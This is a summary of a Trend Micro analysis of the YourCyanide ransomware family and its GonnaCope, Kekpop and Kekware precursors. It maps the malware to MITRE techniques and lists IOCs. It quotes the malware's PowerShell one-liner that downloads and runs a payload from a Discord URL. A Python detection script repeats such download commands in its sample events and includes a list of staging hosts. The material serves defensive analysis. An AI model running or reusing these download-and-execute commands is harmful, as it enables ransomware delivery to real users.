YourCyanide: A CMD-Based Ransomware With Multiple Layers of Obfuscation

Trend Micro’s Threat Hunting team analyzed a series of CMD-based ransomware variants, culminating in YourCyanide, a multi-stage malware that uses layered downloads and heavy obfuscation. The family evolves from GonnaCope through Kekpop and Kekware, employing Discord, Pastebin, and document links to fetch payloads and evading detection with custom environment variables and delayed expansion. #YourCyanide #GonnaCope #Kekware #Kekpop #Discord #Pastebin #LNK

Keypoints

  • YourCyanide is a sophisticated CMD-based ransomware variant that uses multi-layer obfuscation and environment-variable tricks to hide activity and downloads multiple payloads.
  • It relies on a multi-stage delivery chain, starting from an LNK file that downloads YourCyanide.exe via PowerShell from Discord, then proceeds to fetch additional payloads through Pastebin and Discord in successive steps.
  • The ransomware family traces its lineage from GonnaCope (April 2022) to Kekpop and Kekware, with each variant introducing new capabilities such as credential collection and enabling RDP.
  • Early variants like GonnaCope could overwrite files or avoid certain capabilities, while later variants add network-wide notifications and more aggressive features, indicating a worm/propagation mindset.
  • Behavioral differences across variants include auto-start mechanisms, disabling Task Manager, collecting installed apps and browser passwords, and renaming or encrypting files in various ways.
  • Trend Micro notes very low detections due to heavy obfuscation, and highlights the actors’ apparent monitoring of sandbox usernames to tailor evasion lists.
  • Trend Micro recommends a multilayer defense approach (Vision One, Cloud One Workload Security, Deep Discovery Email Inspector, and Apex One) to detect and block these components and behaviors.

MITRE Techniques

  • [T1059.001] PowerShell – The LNK arrives with a PowerShell command to download and run the payload. Quote relevant content: “…contains the following PowerShell script for downloading the ‘YourCyanide.exe’ 64-bit executable from Discord and executing it: ‘C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command “(New-Object Net.WebClient).DownloadFile(‘hxxps://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe’, ‘YourCyanide.exe’)”; start YourCyanide.exe’.”
  • [T1105] Ingress Tool Transfer – The payload is downloaded from external sources (Discord, Pastebin) as part of a staged delivery. Quote relevant content: “…downloading the ‘YourCyanide.exe’ 64-bit executable from Discord and executing it” and “downloading the succeeding files via Discord and Pastebin with each step…”
  • [T1547.001] Boot or Logon Autostart Execution – The malware “creates auto-start mechanism” to persist on reboot. Quote relevant content: “Creates auto-start mechanism” in the variant comparison.
  • [T1027] Obfuscated/Compressed Files or Information – The article notes “multiple layers of obfuscation and takes advantage of custom environment variables and the Enable Delayed Expansion function to hide its activities.”
  • [T1562.001] Impair Defenses – The ransomware family “disables task manager” as part of its evasion. Quote relevant content: “Disables task manager” in the variant table.
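As an added defender-side example (not code from the Trend Micro report), the following Python sketch scans process-creation events for the LNK-to-PowerShell download pattern summarized above: a PowerShell download primitive paired with one of the staging hosts the report names (Discord CDN, Pastebin). The sample events, host list and regexes are constructed assumptions, and an explorer.exe parent is only treated as a hint that a shortcut was double-clicked.

```python
import re

# Constructed sample process-creation events, not taken from the Trend Micro report.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Command "
                 "\"(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/"
                 "111/222/YourCyanide.exe', 'YourCyanide.exe')\"; start YourCyanide.exe")},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command \"Get-Process | Sort-Object CPU\""},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -c \"(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/abcd1234')\""},
]

# Hosts the report names as payload staging points for this family (assumed list).
STAGING_HOSTS = ("cdn.discordapp.com", "pastebin.com")
# PowerShell download primitives worth flagging when paired with a staging host.
DOWNLOAD_RE = re.compile(r"Net\.WebClient\)\.Download(File|String)|Invoke-WebRequest|Start-BitsTransfer", re.I)
URL_RE = re.compile(r"https?://([^/'\"\s]+)", re.I)


def score_event(event):
    """Return a finding for a PowerShell download from a known staging host, else None."""
    if not event["image"].lower().endswith("powershell.exe"):
        return None
    cmd = event["cmdline"]
    if not DOWNLOAD_RE.search(cmd):
        return None
    hosts = [h.lower() for h in URL_RE.findall(cmd)]
    staging = [h for h in hosts if h in STAGING_HOSTS]
    if not staging:
        return None
    return {
        "techniques": ["T1059.001", "T1105"],
        "hosts": staging,
        # explorer.exe as parent is consistent with a user launching an LNK shortcut.
        "lnk_like_parent": event["parent"].lower() == "explorer.exe",
        "cmdline": cmd,
    }


def scan(events):
    """Run score_event over every event and keep only the findings."""
    return [f for f in (score_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["techniques"], finding["hosts"], finding["lnk_like_parent"])
```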

Indicators of Compromise

  • [File] GonnaCope.Bat – ab71472e5a66740369c70715245a948d452a59ea7281233d6ad4c53dfa36b968, 0dff760288b3dfebc812761a2596563e5f0aea8ffc9ca4a4c26fa46e74311122, and 2 more hashes
  • [File] GonnaCopeDL – f9fdfb0d4e2d2ea06ce9222280cd03d25c9768dfa502b871846153be30816fd3
  • [Bitcoin Wallet] bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll, bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf
  • [LNK] 31655244d3b77ae661f10199cd823f54c473d92a88ae892ee1b75bc5794482ad, 9e973f75c22c718c7438bc1d4614be11ae18e2d5140ecc44c166b5f5102d5fbe, c5d842735709618ee4f2521c95bf029a0690c3cbe5f7a06a916f633ebe09dd50, f9a2c524c270d581b83c010136402c00623bb36b2dd7758ea5e59c9369fa7649
  • [LNK] KEKPOP.YXCEST variants – multiple LNK/shortcut samples with associated detections (Trojan.LNK.KEKPOP.YXCEST, Trojan.LNK.KEKPOP.YXCERT)
  • [Username] a.monaldo, karolisliucveikis, soumy
  • [Email] contact at [email protected]

Read more: https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html